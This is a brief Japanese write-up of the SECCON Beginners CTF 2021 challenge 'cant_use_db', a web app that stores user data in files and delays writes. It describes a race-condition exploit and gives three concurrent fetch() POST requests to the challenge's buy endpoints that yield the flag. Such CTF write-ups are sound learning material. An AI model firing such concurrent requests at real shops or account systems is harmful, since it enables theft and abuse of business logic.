[SECCON BEGINNERS CTF 2021] cant_use_db
Can't use DB.
I have so little money that I can't even buy the ingredients for ramen.
🍜
https://cant-use-db.quals.beginners.seccon.jp/
問題
ソースコードが与えられます。
ユーザーのデータ管理がDBではなくファイルで行われている&書き込みをtime.sleepで行っています。
解法
同時に3つのリクエストを送ればFLAGが出ます。pythonだと同期しちゃっていちいちリクエスト待ちになり、めんどくさいことになるためデバッグツールからfetchAPIで非同期に3回たたきました。これでFLAGを得ます。
fetch("https://cant-use-db.quals.beginners.seccon.jp/buy_noodles", {
"credentials": "include",
"method": "POST",
"mode": "cors"
});
fetch("https://cant-use-db.quals.beginners.seccon.jp/buy_noodles", {
"credentials": "include",
"method": "POST",
"mode": "cors"
});
fetch("https://cant-use-db.quals.beginners.seccon.jp/buy_soup", {
"credentials": "include",
"method": "POST",
"mode": "cors"
});